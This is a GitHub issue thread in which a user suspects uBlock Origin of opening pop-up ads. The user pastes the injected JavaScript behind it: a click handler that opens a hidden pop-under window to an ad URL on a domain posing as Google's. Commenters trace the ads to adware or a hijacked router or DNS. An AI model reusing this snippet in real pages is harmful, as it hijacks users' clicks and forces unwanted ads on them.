### ISSUE TITLE
Single click on pages is causing ads to open after installing Ublock or Ublock origin from Chrome webstore

### ISSUE THREAD

**Issue by adityamenon-iom** [gorhill/uBlock#607]
I am not sure if this is an issue with my Linux Mint system or the extension, but I have noticed this behavior on both Chromium and Firefox extensions.

I had put a couple breakpoints to catch mouse events to find the scripts, and the script I have found is as follows:

### VM1302.js
```
var ll = false;
        function doOpen(l1)
        {
                if ( ll == true )
                {
                        return true;
                }
                win = window.open(l1, 'ljPu', 'toolbar,status,resizable,scrollbars,menubar,location,height=760,width=800');
                if ( win )
                {
                        win.blur();
                        ll = true;
                }
                return win;
        }
        function setCookie(lI, value, time)
        {
            var expires = new Date();
            expires.setTime( expires.getTime() + time );
            document.cookie = lI + '=' + value + '; expires=' + expires.toGMTString();
        }
        function getCookie(lI) {
            var cookies = document.cookie.toString().split('; ');
            var cookie, c_name, c_value;
            for (var l1l=0; l1l<cookies.length; l1l++) {
                cookie  = cookies[l1l].split('=');
                c_name  = cookie[0];
                c_value = cookie[1];
                if ( c_name == lI ) {
                    return c_value;
                }
            }
            return null;
        }
        function initPu()
        {	var l11 = '* { target-new: tab ! important }',
			head = document.head || document.getElementsByTagName('head')[0],
			style = document.createElement('style');
			style.type = 'text/css';
if (style.styleSheet){
  style.styleSheet.cssText = l11;
} else {
  style.appendChild(document.createTextNode(l11));
}

                if ( document.attachEvent )
                {
                        document.attachEvent( 'onclick', checkTarget );
                }
                else if ( document.addEventListener )
                {
                        document.addEventListener( 'click', checkTarget, false );
                }
        }
        function checkTarget(l1I)
        {
			var lIl = navigator.language || navigator.userLanguage; 
				var l1I = l1I || window.event;
				if (lIl != 'tr') {
                var win = doOpen('http://ad-type.google.com/rot.aspx?partner=910345&f=popup-u');
				}
				
        }
		
		
initPu(); 
```

**Comment by gorhill** [comment]
This is not uBlock Origin's code.

**Comment by adityamenon-iom** [comment]
Finishing up my comment for posterity:

OS information:
```
$ inxi -S
System:    Host: redacted Kernel: 3.16.0-4-amd64 x86_64 (64 bit) 
           Desktop: MATE 1.10.0  Distro: LinuxMint 2 betsy 
```

Chromium version: `Version 44.0.2403.89 Built on 8.1`

Downloaded uBlock Origin from Google Chrome App Store. Version: 1.0.0.1

Have no other extension on the browser, very minimal programs on the OS itself. Not sure where it came from.

**Comment by gorhill** [comment]
You still provide **no details** on how to anybody can reproduce.

- Exactly what extension in the store (URL)
- Exactly what pages did you see the behavior? (URL)

That "is causing ads to open after installing Ublock or Ublock origin" is ludicrous -- and this would deserve more supporting evidence than posting javascript code which is unrelated to uBlock.

**Comment by adityamenon-iom** [comment]
Sure. Please find the store extension URLs: https://chrome.google.com/webstore/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm, https://chrome.google.com/webstore/detail/ublock/epcnnfbjfcgphgdmggkamkmgojdagdnn, https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/?src=ss.

I saw this behavior in the following pages: http://www.discogs.com/artist/27862-Ott, http://dictionary.reverso.net/german-english/allerbeste. When I go to these pages for the **first time** (second time clicks won't work; close the page and restart again). Click on the empty area next to the artist name for the Discogs page. Click on the empty area above the "allerbeste" word in the Reverso.net dictionary page.

I posted code that was causing the issue. It might well be non-ublock, which is what I'm investigating. But I saw this happening after installing uBlock Origin and uBlock (the latter when I thought the former's distribution channel somehow got compromised). Hence the claim.

**Comment by adityamenon-iom** [comment]
The filters are defaults: I have not changed any setting after installation of the extension.

**Comment by gorhill** [comment]
> I saw this behavior in the following pages:
> - http://www.discogs.com/artist/27862-Ott
> - http://dictionary.reverso.net/german-english/allerbeste.

Your title implied that this happened on any page, as if uBlock was adware, hence my _ludicrous_. So these are the pages on which it happens.

I tried both pages, multiple times, with Chromium 43/Nightly, and I could not reproduce the issue.

**Comment by gitarra** [comment]
I have no empty areas. Cosmetic filters disabled?

**Comment by kintpuash** [comment]
the google ad network id pulls this link to adware/malware.

http://malwarefixes.com/remove-total-ad-performance-redirect/

Since you are running a linux distro and say you have no other extensions, might check your router (reset?) and systems DNS settings. Hosts file maybe as well. Are you in a mixed OS network?

**Comment by adityamenon-iom** [comment]
@kintpuash thanks for the info! Yes, I'm on a network with a Dual OS Windows/Linux-Mint, Mac OSX, and another LinuxMint. I've seen the same behavior on all of them.

I just upgraded my router firmware yesterday. Oddly, I have another Mac OSX on which this didn't happen (ostensibly because I connected after upgrading the firmware). I think you're right. I don't know what triggered it, but I'll reinstall everything on everything. There's an old internet modem, I'll get that reflashed too.
